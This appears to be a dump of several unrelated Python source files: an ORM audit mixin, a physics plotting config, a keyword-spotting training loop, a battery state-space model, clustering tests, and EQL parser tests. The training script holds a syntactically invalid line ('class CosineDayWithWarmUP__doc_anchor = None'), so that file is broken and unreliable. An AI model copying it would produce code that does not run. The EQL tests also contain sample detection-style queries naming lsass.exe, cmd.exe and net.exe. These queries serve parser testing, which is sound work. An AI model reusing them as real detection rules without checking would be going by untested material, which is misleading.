    created_by = declared_attr(
        lambda cls: relationship(
            'User', primaryjoin='%s.created_by_id == User.id' % cls.__name__
        )
    )
    updated_by_id = declared_attr(
        lambda cls: db.Column(
            UUID,
            db.ForeignKey('user.id'),
            default=cls._get_current_user,
            onupdate=cls._get_current_user,
        )
    )
    updated_by = declared_attr(
        lambda cls: relationship(
            'User', primaryjoin='%s.updated_by_id == User.id' % cls.__name__
        )
    )
    @classmethod
    def _get_current_user(cls):
        # Default: no user context; applications override this hook.
        return None
| closeio/flask-common | flask_common/db.py | db.py | py | 3,814 | python | en | code | 26 | github-code | 13 |
W_str = r"W" + r"\rightarrow" + r"l" + r"\nu_{l}"
# LaTeX decay labels (defined alongside W_str; not referenced by the
# config dict below in this file).
Z_str = r"Z" + r"\rightarrow" + r"l^{+}" + r"l^{-}"
ttbar_str = r"t" + r"\bar{t}"
# Plotting configuration for the single-lepton ttbar analysis:
# integrated luminosity (pb^-1), input folder, histogram list with optional
# per-plot y-axis margins, MC stack composition, and depiction layout.
config = {
    "Luminosity": 10064,
    "InputDirectory": "results",
    "Histograms" : {
        "WtMass" : {},
        "etmiss" : {},
        "lep_n" : {},
        "lep_pt" : {},
        "lep_eta" : {},
        "lep_E" : {},
        "lep_phi" : {"y_margin" : 0.6},
        "lep_charge" : {"y_margin" : 0.6},
        "lep_type" : {"y_margin" : 0.5},
        "lep_ptconerel30" : {},
        "lep_etconerel20" : {},
        "lep_d0" : {},
        "lep_z0" : {},
        "n_jets" : {},
        "jet_pt" : {},
        "jet_eta" : {},
        "jet_MV2c10" : {"y_margin" : 0.3},
    },
    # MC samples grouped into stacked processes (drawn bottom-up in Order),
    # plus the data periods to overlay.
    "Paintables": {
        "Stack": {
            "Order" : ["Diboson", "W", "Z", "stop", "ttbar"],
            "Processes" : {
                "Diboson" : {
                    "Color" : "#fa7921",
                    "Contributions" : ["WWlvlv", "WZlvll", "WZlvvv", "ZZllll", "ZZvvll", "WWlvqq", "WZqqll", "WZlvqq", "ZZqqll"]},
                "W": {
                    "Color" : "#e55934",
                    "Contributions" : ["Wplusenu", "Wplusmunu", "Wplustaunu", "Wminusenu", "Wminusmunu", "Wminustaunu"]},
                "Z": {
                    "Color" : "#086788",
                    "Contributions" : ["Zee", "Zmumu", "Ztautau"]},
                "stop": {
                    "Color" : "#fde74c",
                    "Contributions" : ["single_top_tchan", "single_antitop_tchan", "single_top_wtchan", "single_antitop_wtchan", "single_top_schan", "single_antitop_schan"]},
                "ttbar": {
                    "Color" : "#9bc53d",
                    "Contributions" : ["ttbar_lep"]}
            }
        },
        "data" : {
            "Contributions": ["dataA_1lep.root", "dataB_1lep.root", "dataC_1lep.root", "dataD_1lep.root" ]}
    },
    # Each figure shows the main stack+data panel and a data/MC ratio panel.
    "Depictions": {
        "Order": ["Main", "Data/MC"],
        "Definitions" : {
            "Data/MC": {
                "type" : "Agreement",
                "Paintables" : ["data", "Stack"]
            },
            "Main": {
                "type" : "Main",
                "Paintables": ["Stack", "data"]
            },
        }
    },
}
| jegarcian/hep-ml | createImages/Configurations/PlotConf_TTbarAnalysis.py | PlotConf_TTbarAnalysis.py | py | 2,385 | python | en | code | 0 | github-code | 13 |
from model import kwsmodel
import os
import tensorflow as tf
from tqdm import tqdm
from tensorflow.keras import optimizers
from dataloader import train_iterator
from utils import *
def train_step(model, images, labels, optimizer):
    """One optimisation step on a batch; returns (total loss, predictions).

    Loss is mean categorical cross-entropy plus an L2 term from l2_loss().
    """
    with tf.GradientTape() as tape:
        prediction = model(images, training=True)
        cross_entropy = tf.keras.losses.categorical_crossentropy(labels, prediction)
        cross_entropy = tf.reduce_mean(cross_entropy)
        l2 = l2_loss(model)
        loss = cross_entropy + l2
    gradients = tape.gradient(loss, model.trainable_variables)
    optimizer.apply_gradients(zip(gradients, model.trainable_variables))
    return loss, prediction
def train(model, data_iterator, optimizer):
    """Run one epoch over the training data, printing per-batch metrics.

    NOTE(review): batch size (4) and dataset size (132) are hard-coded here
    and must match what train_iterator() actually yields — confirm.
    """
    bs = 4
    for i in tqdm(range(int(132 / bs))):
        images, labels = data_iterator.next()
        ce, prediction = train_step(model, images, labels, optimizer)
        correct_num = correct_num_batch(labels, prediction)
        print('loss: {:.6f}, accuracy: {:.4f}'.format(ce, correct_num / bs))
class CosineDayWithWarmUP__doc_anchor = None  # (removed)
if __name__ == '__main__':
    # Build the model for 64x40x1 log-mel inputs and train for 100 epochs,
    # testing and checkpointing after every epoch.
    train_data_iterator = train_iterator()
    model = kwsmodel(dim0=4)
    model.build(input_shape=(None,) + (64, 40, 1))
    # model.load_weights('./h5/kws-l2-mixup-14.h5')
    # model = tf.keras.models.load_model("./h5/hand-198.h5")
    model.summary()
    # optimizer = optimizers.SGD(learning_rate=0.0001, momentum=0.9)
    optimizer = optimizers.Adam()
    from test import test
    for epoch_num in range(100):
        train(model, train_data_iterator, optimizer)
        if epoch_num % 1 == 0:
            with open('test_log_3x3_7k.txt', 'a') as f:
                test(model, f)
            model.save('./h5/kws-7k-mixup-64-3x3-%s.h5' % epoch_num, save_format='h5')
| yuyun2000/kws | train.py | train.py | py | 2,599 | python | en | code | 1 | github-code | 13 |
import numpy as np
class StateSpace:
    """Canonical linear state-space model  x' = A x + B u,  y = C x + D u.

    The state is integrated with explicit (forward) Euler; the output
    equation uses the previous state so the measurement lags one step
    (backward-Euler style delay).  n = states, p = inputs, q = outputs.
    """
    def __init__(self, n=0, p=0, q=0):
        self.n = n
        self.p = p
        self.q = q
        self.u = np.zeros(shape=p)
        self.A = np.zeros(shape=(n, n))
        self.B = np.zeros(shape=(n, p))
        self.C = np.zeros(shape=(q, n))
        self.D = np.zeros(shape=(q, p))
        self.y = np.zeros(shape=q)
        self.x = np.zeros(shape=n)
        # Distinct arrays (the original aliased these to self.x).
        self.x_dot = np.zeros(shape=n)
        self.x_past = np.zeros(shape=n)
        self.dt = 0.
        self.saved = Saved(n, p, q)

    def __str__(self, prefix=''):
        """Returns representation of the object"""
        s = prefix + "StateSpace:\n"
        s += "  A = \n {}\n".format(self.A)
        s += "  x = {}\n".format(self.x)
        s += "  B = \n {}\n".format(self.B)
        s += "  u = {}\n".format(self.u)
        s += "  C = \n {}\n".format(self.C)
        s += "  D = \n {}\n".format(self.D)
        s += "  x_dot = {}\n".format(self.x_dot)
        return s

    def calc_x_dot(self, u):
        """Evaluate the state derivative x' = A x + B u for input u."""
        self.u = u
        self.x_dot = self.A @ self.x + self.B @ self.u

    def init_state_space(self, x_init):
        """Reset the state to x_init with zero derivative."""
        self.x = np.array(x_init, dtype=float)
        self.x_past = self.x.copy()  # copy, not alias
        self.x_dot = np.zeros_like(self.x)

    def save(self, time):
        """Append the current signals to the plotting history buffers."""
        self.saved.time = np.append(self.saved.time, time)
        # reshape(1, -1) generalizes the original hard-coded reshape(1, 2),
        # which only worked for two states / two inputs.
        self.saved.u = np.append(self.saved.u, self.u.reshape(1, -1), axis=0)
        self.saved.y = np.append(self.saved.y, self.y)
        self.saved.x = np.append(self.saved.x, self.x.reshape(1, -1), axis=0)
        self.saved.x_dot = np.append(self.saved.x_dot, self.x_dot.reshape(1, -1), axis=0)
        self.saved.x_past = np.append(self.saved.x_past, self.x_past.reshape(1, -1), axis=0)

    def update(self, dt):
        """Advance one Euler step and return the (one-step-delayed) output."""
        if dt is not None:
            self.dt = dt
        # Bug fix: take a copy.  'self.x_past = self.x' followed by an
        # in-place '+=' mutated x_past as well, so y was computed from the
        # already-updated state and the intended delay was lost.
        self.x_past = self.x.copy()
        self.x = self.x + self.x_dot * self.dt
        self.y = self.C @ self.x_past + self.D @ self.u  # uses past (backward Euler)
        return self.y


class Saved:
    # Plot-history buffers.  (A 'Saver'-style helper built on __dict__, as in
    # pyfilter, would be tidier — kept simple here, per the original note.)
    def __init__(self, n=0, p=0, q=0):
        self.time = np.zeros(shape=1)
        self.n = n
        self.p = p
        self.q = q
        self.u = np.zeros(shape=(1, p))
        self.y = np.zeros(shape=q)
        self.x = np.zeros(shape=(1, n))
        # Distinct buffers (the original aliased these to self.x).
        self.x_dot = np.zeros(shape=(1, n))
        self.x_past = np.zeros(shape=(1, n))
if __name__ == '__main__':
    import sys
    import doctest
    # Run any doctests defined in this module when executed directly.
    doctest.testmod(sys.modules['__main__'])
def construct_state_space_monitor():
    """Build (A, B, C, D) for the Randles circuit with negated output
    coefficients (C = [-1, -1], D = [-r0, 1]); prints the derived values."""
    r0 = 0.003       # Randles R0, ohms
    tau_ct = 0.2     # Randles charge transfer time constant, s (=1/Rct/Cct)
    rct = 0.0016     # Randles charge transfer resistance, ohms
    tau_dif = 83     # Randles diffusion time constant, s (=1/Rdif/Cdif)
    r_dif = 0.0077   # Randles diffusion resistance, ohms
    c_ct = tau_ct / rct
    c_dif = tau_dif / r_dif
    print('-1/Rc/Cc=', -1/tau_ct, '-1/Rd/Cd=', -1/tau_dif)
    print('1/Cc=', 1/c_ct, '1/Cd=', 1/c_dif)
    print('r0=', r0)
    a = np.diag([-1 / tau_ct, -1 / tau_dif])
    b = np.array([[1 / c_ct, 0],
                  [1 / c_dif, 0]])
    c = np.array([-1., -1])
    d = np.array([-r0, 1])
    return a, b, c, d
def construct_state_space_model():
    """Build Randles-circuit (A, B, C, D) matrices for the model variant.

    Same dynamics as the monitor; the output equation uses positive gains.
    """
    r0 = 0.003  # Randles R0, ohms
    tau_ct = 0.2  # Randles charge transfer time constant, s (=1/Rct/Cct)
    rct = 0.0016  # Randles charge transfer resistance, ohms
    tau_dif = 83  # Randles diffusion time constant, s (=1/Rdif/Cdif)
    r_dif = 0.0077  # Randles diffusion resistance, ohms
    c_ct = tau_ct / rct
    c_dif = tau_dif / r_dif
    print('-1/Rc/Cc=', -1/tau_ct, '-1/Rd/Cd=', -1/tau_dif)
    print('1/Cc=', 1/c_ct, '1/Cd=', 1/c_dif)
    print('r0=', r0)
    # Diagonal dynamics; the single (voltage) input drives both branches.
    a = np.diag([-1 / tau_ct, -1 / tau_dif])
    b = np.array([[1 / c_ct, 0],
                  [1 / c_dif, 0]])
    c = np.full(2, 1.)
    d = np.array([r0, 1])
    return a, b, c, d
def main():
    """Build the monitor and model state spaces and print their matrices."""
    ss = StateSpace(2, 2, 1)
    builders = (('Monitor::', construct_state_space_monitor),
                ('Model::', construct_state_space_model))
    # Same print order as before: Monitor first, then Model.
    for label, build in builders:
        ss.A, ss.B, ss.C, ss.D = build()
        print(label)
        print('A=', ss.A)
        print('B=', ss.B)
        print('C=', ss.C)
        print('D=', ss.D)
# NOTE(review): unconditional top-level call — main() also runs on import,
# bypassing the `if __name__ == '__main__'` guard defined earlier in this
# file; consider moving it under that guard.
main()
| davegutz/myStateOfCharge | SOC_Particle/Battery State/EKF/sandbox/StateSpace.py | StateSpace.py | py | 4,669 | python | en | code | 1 | github-code | 13 |
from curses import raw
import pytest
from unittest.mock import Mock, patch
import json
import numpy as np
from copy import deepcopy
from uuid import uuid4
import tasks.cluster_texts as clusterer
from tasks.cluster_texts import KeywordItem
from tests.data.fixtures import (
CLUSTERED_DATA,
NESTED_DATA,
MULTI_NESTED_DATA,
MULTI_NESTED_DATA_W_CHILDREN_COUNT
)
class MyEncoder(json.JSONEncoder):
    """JSON encoder that converts numpy scalars and arrays to native types."""

    def default(self, obj):
        # Map numpy types onto their built-in equivalents; defer everything
        # else to the base encoder (which raises TypeError).
        if isinstance(obj, np.integer):
            return int(obj)
        if isinstance(obj, np.floating):
            return float(obj)
        if isinstance(obj, np.ndarray):
            return obj.tolist()
        return super().default(obj)
def get_test_embedding_data():
    """Load the first 100 raw-embedding records from the JSON-lines fixture."""
    file_name = 'tests/data/raw_embedding_1000.json'
    with open(file_name, 'r') as f:
        lines = f.readlines()
    # Only a slice of the fixture is needed; keeps the tests fast.
    lines = lines[:100]
    # (The original looped `line = line.strip()` here, which only rebound the
    # loop variable and had no effect; json.loads tolerates the newline.)
    embedding_data = [json.loads(line) for line in lines]
    return embedding_data
@pytest.fixture
def raw_embedding():
    """First 100 raw embedding records loaded from the JSON-lines fixture file."""
    return get_test_embedding_data()
@pytest.fixture
def raw_embedding_w_seq_id():
    """Raw embedding records with a fixture sequence_id stamped on each one."""
    records = get_test_embedding_data()
    for record in records:
        record['sequence_id'] = 'a_job_id_fixture'
    return records
@pytest.fixture
def low_dim_embedding():
    """Parsed low-dimensional embedding fixture."""
    with open('tests/data/low_dim_embedding.json', 'r') as f:
        return json.load(f)
@pytest.fixture
def hierarchical_clustering():
    """Stored hierarchical-clustering snapshot, parsed from JSON."""
    with open('tests/data/hierarchical_clustering.json') as f:
        return json.load(f)
@pytest.fixture
def bfs_break_down():
    """Stored BFS break-down snapshot, parsed from JSON."""
    with open('tests/data/bfs_break_down.json') as f:
        return json.load(f)
def test_reduce_dimension(raw_embedding):
    """reduce_dimension keeps the row count and adds a 2-D embedding per row."""
    reduced = clusterer.reduce_dimension(raw_embedding)
    assert len(reduced) == len(raw_embedding)
    for record in reduced:
        assert 'low_dim_embedding' in record
        assert len(record['low_dim_embedding']) == 2
def test_cluster_data(low_dim_embedding):
    """Every clustered record carries head/label metadata under cluster_info."""
    result = clusterer.cluster_data(
        low_dim_embedding, coordinates_key='low_dim_embedding')
    for record in result:
        assert 'cluster_info' in record
        assert 'is_cluster_head' in record['cluster_info']
        assert 'cluster_label' in record['cluster_info']
def test_format_to_nested_clustering():
    """Flat clustered records reshape into the expected nested structure."""
    nested = clusterer.format_to_nested_clustering(CLUSTERED_DATA)
    assert nested == NESTED_DATA
def test_cluster_hierarchically(
    low_dim_embedding,
    hierarchical_clustering
):
    """Hierarchical clustering of the fixture matches the stored snapshot."""
    # massage data
    for e in low_dim_embedding:
        e['embedding'] = ''
        # e['text'] = e['uuid'][:6]
    actual_result = clusterer.cluster_hierarchically(
        low_dim_embedding
    )
    # Snapshot regeneration helper — uncomment to rewrite the fixture file
    # after an intentional algorithm change, then re-comment.
    # with open('tests/data/hierarchical_clustering.json', 'w') as f:
    #     f.write(json.dumps(
    #         actual_result,
    #         cls=MyEncoder,
    #         indent=4
    #     ))
    expected_result = hierarchical_clustering
    assert expected_result == actual_result
@pytest.mark.skip("BFS break down is deprecated for now")
def test_bfs_break_down(
    hierarchical_clustering,
    bfs_break_down
):
    """bfs_break_down splits oversized clusters in place (currently skipped)."""
    data = deepcopy({'children': hierarchical_clustering})
    clusterer.bfs_break_down(data, max_cluster_size=5)
    assert data == bfs_break_down
def test_insert_children_count():
    """insert_children_count annotates nested nodes with their child counts."""
    expected_result = MULTI_NESTED_DATA_W_CHILDREN_COUNT
    # NOTE(review): this mutates the imported MULTI_NESTED_DATA fixture in
    # place, so it stays modified for any test that runs after this one.
    clusterer.insert_children_count(MULTI_NESTED_DATA)
    actual_result = MULTI_NESTED_DATA
    assert actual_result == expected_result
def test__group_keywords_by_count():
    """Keywords merge by word, summing count and relevance, best item first."""
    sample_data = [
        KeywordItem(count=1, word='cables', relevance_score=0.39),
        KeywordItem(count=1, word='cable', relevance_score=0.3),
        KeywordItem(count=1, word='snapon', relevance_score=0.44),
        KeywordItem(count=1, word='cable', relevance_score=0.23),
        KeywordItem(count=1, word='cable', relevance_score=0.35),
        KeywordItem(count=1, word='cable', relevance_score=0.35),
        KeywordItem(count=1, word='copper', relevance_score=0.39),
        KeywordItem(count=1, word='cable', relevance_score=0.43),
        KeywordItem(count=1, word='cable', relevance_score=0.35),
        KeywordItem(count=1, word='cable', relevance_score=0.43),
        KeywordItem(count=1, word='cable', relevance_score=0.28),
        KeywordItem(count=1, word='cabled', relevance_score=0.39),
    ]
    # (A dict-shaped `expected_result` list used to sit here but was never
    # referenced by any assertion; removed as dead code.)
    result = clusterer._group_keywords_by_count(sample_data)
    # The eight 'cable' entries collapse into one item whose relevance is the
    # sum of their scores (0.3+0.23+0.35+0.35+0.43+0.35+0.43+0.28 = 2.72).
    assert (result[0].word, result[0].count, result[0].relevance_score) == ('cable', 8, 2.72)
@patch('tasks.cluster_texts._load_embeddings_from_db')
@patch('tasks.cluster_texts.TextModel')
def test_execute(mock_text_model, mock_embedding, raw_embedding_w_seq_id):
    """Smoke-test ClusterTexts.execute() with the text model and DB mocked."""
    np.random.seed(1)
    class MockTextModel:
        # Stand-in for TextModel: returns a deterministic 2-D pseudo-embedding.
        def get_embedding_by_text(self, *args):
            return list(np.random.randn(2))
    sequence_id = 'test_sequence_id_' + str(uuid4())
    # mock_text_model.get_embedding_by_text.return_value = list(rnd_vect)
    # NOTE(review): return_value is set to the class itself, not an instance —
    # confirm the code under test expects a class (or instantiates it).
    mock_text_model.return_value = MockTextModel
    cluster_texts = clusterer.ClusterTexts(kwargs={
        "sequence_id": sequence_id,
    })
    mock_embedding.return_value = raw_embedding_w_seq_id
    # Result intentionally unchecked: this only asserts execute() runs cleanly.
    res = cluster_texts.execute()
    # breakpoint()
| visda-app/service-mapping | tests/tasks/test_clusterer.py | test_clusterer.py | py | 5,866 | python | en | code | 0 | github-code | 13 |
import urllib.request, urllib.parse, urllib.error
import json
# Resets calls to 0 if worldclockapi indicates new day
def check(current, calls):
    """Return `calls`, reset to 0 when the API reports a new day.

    current: previously observed dayOfTheWeek string.
    calls: running call counter.
    The original rebound the local `calls` without returning it, so the
    reset never reached the caller; the value is now returned.
    """
    # Connect with worldclockapi
    url = 'http://worldclockapi.com/api/json/est/now'
    doc = urllib.request.urlopen(url)
    data = doc.read().decode()
    # Create JSON object with api data; json.loads raises ValueError subclass
    # on malformed payloads (the original used a bare except)
    try:
        js = json.loads(data)
    except ValueError:
        js = None
    # Reset calls to 0 if dayOfTheWeek does not match previous dayOfTheWeek;
    # guard against a failed parse instead of crashing on js[...]
    if js is not None and js['dayOfTheWeek'] != current:
        calls = 0
    return calls
# Returns string corresponding to current dayOfTheWeek
def current():
    """Return the current dayOfTheWeek string reported by worldclockapi."""
    # Connect with worldclockapi
    url = 'http://worldclockapi.com/api/json/est/now'
    doc = urllib.request.urlopen(url)
    data = doc.read().decode()
    # Create JSON object with api data; narrow the original bare except to
    # the ValueError json.loads actually raises
    try:
        js = json.loads(data)
    except ValueError:
        js = None
    # NOTE(review): if parsing failed, js is None and the subscript raises
    # TypeError — same outcome as the original version.
    # Return current dayOfTheWeek
    return js['dayOfTheWeek']
| aidenszeto/Dictionary-Bot | timer.py | timer.py | py | 940 | python | en | code | 2 | github-code | 13 |
"""Test case."""
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import datetime
import sys
import traceback
import unittest
from eql import Schema
from eql.ast import * # noqa: F403
from eql.errors import EqlSchemaError, EqlSyntaxError, EqlSemanticError, EqlTypeMismatchError, EqlParseError
from eql.parser import (
allow_negation, allow_sample, allow_runs, parse_query, parse_expression, parse_definitions,
ignore_missing_functions, parse_field, parse_literal, extract_query_terms, keywords, elasticsearch_syntax,
elastic_endpoint_syntax, elasticsearch_validate_optional_fields
)
from eql.walkers import DepthFirstWalker
from eql.pipes import * # noqa: F403
class TestParser(unittest.TestCase):
"""Test EQL parsing."""
    def test_valid_expressions(self):
        """Test that valid expressions parse without raising."""
        valid = [
            "1 == 1",
            "false != (1 == 1)",
            'abc != "ghi"',
            "abc > 20",
            "startsWith(abc, 'abc')",
            "concat(a,b,c,d,)",
            "a in (1,2,3,4,)",
            "length(abc) < length(hij)",
            "length(concat(abc))",
            'abc == substring("abc", 1, 3)',
            "1",
            '(1)',
            "true",
            "false",
            "null",
            "not null",
            "abc",
            '"string"',
            'abc and def',
            '(1==abc) and def',
            '1 * 2 + 3 * 4 + 10 / 2',
            # opt-in with eql.parser.implied_booleans
            # 'abc == (1 and 2)',
            # 'abc == (def and 2)',
            'abc == (def and def)',
            'abc == (def and ghi)',
            '"\\b\\t\\r\\n\\f\\\\\\"\\\'"',
            '1 - -2',
            '1 + -2',
            '1 * (-2)',
            '3 * -length(file_path)',
        ]
        # Success criterion is simply "does not raise".
        for query in valid:
            parse_expression(query)
    def test_parse_field(self):
        """Test that fields are parsed correctly: dotted/indexed paths parse, non-fields raise."""
        # Surrounding whitespace is tolerated.
        self.assertEqual(parse_field("process_name "), Field("process_name"))
        self.assertEqual(parse_field("TRUE "), Field("TRUE"))
        self.assertEqual(parse_field(" data[0]"), Field("data", [0]))
        self.assertEqual(parse_field("data[0].nested.name"), Field("data", [0, "nested", "name"]))
        # Blank input, literals, keywords, and expressions are not bare fields.
        self.assertRaises(EqlParseError, parse_field, " ")
        self.assertRaises(EqlParseError, parse_field, "100.5")
        self.assertRaises(EqlParseError, parse_field, "true")
        self.assertRaises(EqlParseError, parse_field, "and")
        self.assertRaises(EqlParseError, parse_field, "length(name) and path")
    def test_parse_literal(self):
        """Test that literals are parsed correctly; non-literal input raises."""
        self.assertEqual(parse_literal("true"), Boolean(True))
        self.assertEqual(parse_literal("null"), Null())
        self.assertEqual(parse_literal(" 100.5 "), Number(100.5))
        # NOTE(review): duplicate of the first assertion — possibly meant to
        # cover "false"; confirm against intent before changing.
        self.assertEqual(parse_literal("true"), Boolean(True))
        self.assertEqual(parse_literal("'C:\\\\windows\\\\system32\\\\cmd.exe'"),
                         String("C:\\windows\\system32\\cmd.exe"))
        self.assertRaises(EqlParseError, parse_field, "and")
        self.assertRaises(EqlParseError, parse_literal, "process_name")
        self.assertRaises(EqlParseError, parse_literal, "length('abc')")
        self.assertRaises(EqlParseError, parse_literal, "True")
    def test_functions(self):
        """Test that functions are being parsed correctly."""
        # Make sure that functions are parsing all arguments
        # (ignore_missing_functions lets the unknown name parse anyway)
        with ignore_missing_functions:
            fn = parse_expression('somefunction( a and c, false, d or g) ')
        self.assertIsInstance(fn, FunctionCall)
        self.assertEqual(len(fn.arguments), 3)
    def test_invalid_expressions(self):
        """Test that invalid expressions raise parse errors."""
        invalid = [
            '', # empty
            'a xor b', # made up comparator
            'a ^ b', # made up comparator
            'a b c d', # missing syntax
            'def[]', # no index
            'def[ghi]', # index not a number
            'def[-1]', # negative indexes not supported
            'someFunc().abc', # invalid function
            'length().abc', # can't index these
            '1.2.3', # invalid number
            'a.1',
            '(field', # unclosed paren
            '(field xx', # unclosed paren and bad syntax
            'field[', # unclosed bracket
            'field[0', # unclosed bracket
            '(',
            ')',
            '()', # nothing inside
            '',
            '"invalid"string"',
            'descendant of [event_type where true',
            '--100',
            '1000 100',
            '"" 100',
            # literal values as fields and functions
            'true.100',
            'true()',
            'null.abc',
            'abc[0].null',
            # require escape slashes,
            '\\R',
            '\\W',
            # minimum of 1 argument
            'length()',
            'concat()',
        ]
        # NOTE(review): this local list shadows the `keywords` imported from
        # eql.parser at the top of the file; the shadowing is intentional here.
        keywords = [
            'and', 'by', 'in', 'join', 'macro', 'not', 'of', 'or', 'sequence', 'until', 'where', 'with'
        ]
        for query in invalid:
            self.assertRaises(EqlParseError, parse_expression, query)
        # Lowercase keywords are reserved; uppercase variants parse as fields.
        for keyword in keywords:
            self.assertRaises(EqlSyntaxError, parse_expression, keyword)
            parse_expression(keyword.upper())
def test_valid_queries(self):
"""Make sure that EQL queries are properly parsed."""
valid = [
'file where true',
'file where true and true',
'file where false or true',
'registry where not pid',
'process where process_name == "net.exe" and command_line == "* user*.exe"',
'process where command_line == "~!@#$%^&*();\'[]{}\\\\|<>?,./:\\"-= \' "',
'process where \n\n\npid ==\t 4',
'process where process_name in ("net.exe", "cmd.exe", "at.exe")',
'process where command_line == "*.exe *admin*" or command_line == "* a b*"',
'process where pid in (1,2,3,4,5,6,7,8) and abc == 100 and def == 200 and ghi == 300 and jkl == x',
'process where ppid != pid',
'image_load where not x != y',
'image_load where not x == y',
'image_load where not not not not x < y',
'image_load where not x <= y',
'image_load where not x >= y',
'image_load where not x > y',
'process where _leadingUnderscore == 100',
'network where 1 * 2 + 3 * 4 + 10 / 2 == 2 + 12 + 5',
# now requires eql.parser.implied_booleans
# 'file where (1 - -2)',
# 'file where 1 + (-2)',
# 'file where 1 * (-2)',
# 'file where 3 * -length(file_path)',
'network where a * b + c * d + e / f == g + h + i',
'network where a * (b + c * d) + e / f == g + h + i',
'process where pid == 4 or pid == 5 or pid == 6 or pid == 7 or pid == 8',
'network where pid == 0 or pid == 4 or (ppid == 0 or ppid = 4) or (abc == defgh) and process_name == "*" ',
'network where pid = 4',
'process where descendant of [process where process_name == "lsass.exe"] and process_name == "cmd.exe"',
'join \t\t\t[process where process_name == "*"] [ file where file_path == "*"\n]',
'join by pid [process where name == "*"] [file where path == "*"] until [process where opcode == 2]',
'sequence [process where name == "*"] [file where path == "*"] until [process where opcode == 2]',
'sequence by pid [process where name == "*"] [file where path == "*"] until [process where opcode == 2]',
'join [process where process_name == "*"] by process_path [file where file_path == "*"] by image_path',
'sequence [process where process_name == "*"] by process_path [file where file_path == "*"] by image_path',
'sequence by pid [process where process_name == "*"] [file where file_path == "*"]',
'sequence by pid with maxspan=200ms [process where process_name == "*" ] [file where file_path == "*"]',
'sequence by pid with maxspan=1s [process where process_name == "*" ] [file where file_path == "*"]',
'sequence by pid with maxspan=2h [process where process_name == "*"] [file where file_path == "*"]',
'sequence by pid with maxspan=3d [process where process_name == "*"] [file where file_path == "*"]',
'dns where pid == 100 | head 100 | tail 50 | unique pid',
'network where pid == 100 | unique command_line | count',
'security where user_domain == "endgame" | count user_name a b | tail 5',
'process where 1==1 | count user_name, unique_pid, concat(field2,a,bc)',
'process where 1==1 | unique user_name, concat(field2,a,bc), field2',
'registry where a.b',
'registry where a[0]',
'registry where a.b.c.d.e',
'registry where a.b.c[0]',
'registry where a[0].b',
'registry where a[0][1].b',
'registry where a[0].b[1]',
'registry where topField.subField[100].subsubField == 0',
'process where true | filter true',
'process where 1==1 | filter abc == def',
'process where 1==1 | filter abc == def and 1 != 2',
'process where 1==1 | count process_name | filter percent > 0.5',
'process where a > 100000000000000000000000000000000',
'any where true | unique a b c | sort a b c | count',
'any where true | unique a, b, c | sort a b c | count',
'any where true | unique a, b, c | sort a,b,c | count',
'file where child of [registry where true]',
'file where event of [registry where true]',
'file where event of [registry where true]',
'file where descendant of [registry where true]',
# multiple by values
'sequence by field1 [file where true] by f1 [process where true] by f1',
'sequence by a,b,c,d [file where true] by f1,f2 [process where true] by f1,f2',
'sequence [file where 1=1] by f1,f2 [process where 1=1] by f1,f2 until [process where 1=1] by f1,f2',
'sequence by f [file where true] by a,b [process where true] by c,d until [process where 1=1] by e,f',
# sequence with named params
'sequence by unique_pid [process where true] [file where true] fork',
'sequence by unique_pid [process where true] [file where true] fork=true',
'sequence by unique_pid [process where true] [file where true] fork=false',
]
datetime.datetime.now()
for i, text in enumerate(valid):
try:
query = parse_query(text)
rendered = query.render()
self.assertEqual(text.split()[0], rendered.split()[0])
# parse it again to make sure it's still valid and doesn't change
parse_again = parse_query(rendered)
rendered_again = parse_again.render()
# repr + eval should also restore it properly
# Test that eval + repr works
actual_repr = repr(query)
eval_actual = eval(actual_repr)
self.assertEqual(query, parse_again, "Query didn't reparse correctly.")
self.assertEqual(rendered, rendered_again)
self.assertEqual(query, eval_actual)
except (EqlSyntaxError, EqlSemanticError):
ex_type, ex, tb = sys.exc_info()
traceback.print_exc()
traceback.print_tb(tb)
self.fail("Unable to parse query #{}: {}".format(i, text))
def test_invalid_queries(self):
"""Test that invalid queries throw the proper error."""
invalid = [
'', # empty
'process where process_name == "abc.exe" garbage extraneous \"input\"',
'garbage process where process_name < "abc.e"xe"',
'process',
'process where abc == "extra"quote"',
'file where and',
'file where file_name and',
'file_name and',
'file_name )',
'file_name (\r\n\r\n',
'file_name where (\r\n\r\n)',
'process where 1field == 2field',
'sequence where 1field == 2field',
'process where true | filter',
'process where true | badPipe',
'process where true | badPipe a b c',
'process where true | head -100',
'process where descendant of []',
'file where nothing of [process where true]',
'file where DescenDant of [process where true]',
'garbage',
'process where process_name == "abc.exe" | count 100',
'process where process_name == "abc.exe" | unique 100',
'process where process_name == "abc.exe" | sort 100',
'process where process_name == "abc.exe" | head 100 abc',
'process where process_name == "abc.exe" | head abc',
'process where process_name == "abc.exe" | head abc()',
'process where process_name == "abc.exe" | head abc(def, ghi)',
'sequence [process where pid == pid]',
'sequence [process where pid == pid] []',
'sequence with maxspan=false [process where true] [process where true]',
'sequence with badparam=100 [process where true] [process where true]',
'sequence [process where opcode == 1] by unique_pid [file where opcode == 0] by unique_pid with runs=2',
# check that the same number of BYs are in every subquery
'sequence with runs=2 [file where opcode == 0] [file where opcode == 0]',
'sequence [file where true] [process where true] until [network where true] with runs=2',
'join [file where opcode == 0] [file where opcode == 0] with runs=1',
'sequence [file where true] [process where true] by field1',
'sequence [file where true] by field [file where true] by field1 until [file where true]',
'sequence by a,b,c [file where true] by field [file where true] by field1 until [file where true]',
'sequence [file where 1] by field [file where 1] by f1 until [file where 1] by f1,f2 | unique field',
'sequence [process where 1] fork=true [network where 1]',
'sequence [process where 1] [network where 1] badparam=true',
'sequence [process where 1] [network where 1] fork=true fork=true',
'sequence [process where 1] [network where 1] fork fork',
'process where descendant of [file where true] bad=param',
'| filter true'
# forks updated to stictly take true/false (true if not defined)
'sequence by unique_pid [process where true] [file where true] fork=1',
'sequence by unique_pid [process where true] [file where true] fork=0 [network where true]',
'sequence by unique_pid [process where true] [file where true] fork=0',
# time units made stricter, and floating points removed
'sequence by pid with maxspan=2sec [process where process_name == "*" ] [file where file_path == "*"]',
'sequence by pid with maxspan=200 [process where process_name == "*" ] [file where file_path == "*"]',
'sequence by pid with maxspan=2seconds [process where process_name == "*" ] [file where file_path == "*"]',
'sequence with maxspan=2.5m [process where x == x] by pid [file where file_path == "*"] by ppid',
'sequence by pid with maxspan=2.0h [process where process_name == "*"] [file where file_path == "*"]',
'sequence by pid with maxspan=2.0h [process where process_name == "*"] [file where file_path == "*"]',
'sequence by pid with maxspan=1.0075d [process where process_name == "*"] [file where file_path == "*"]',
# bad sequence alias, without endpoint syntax
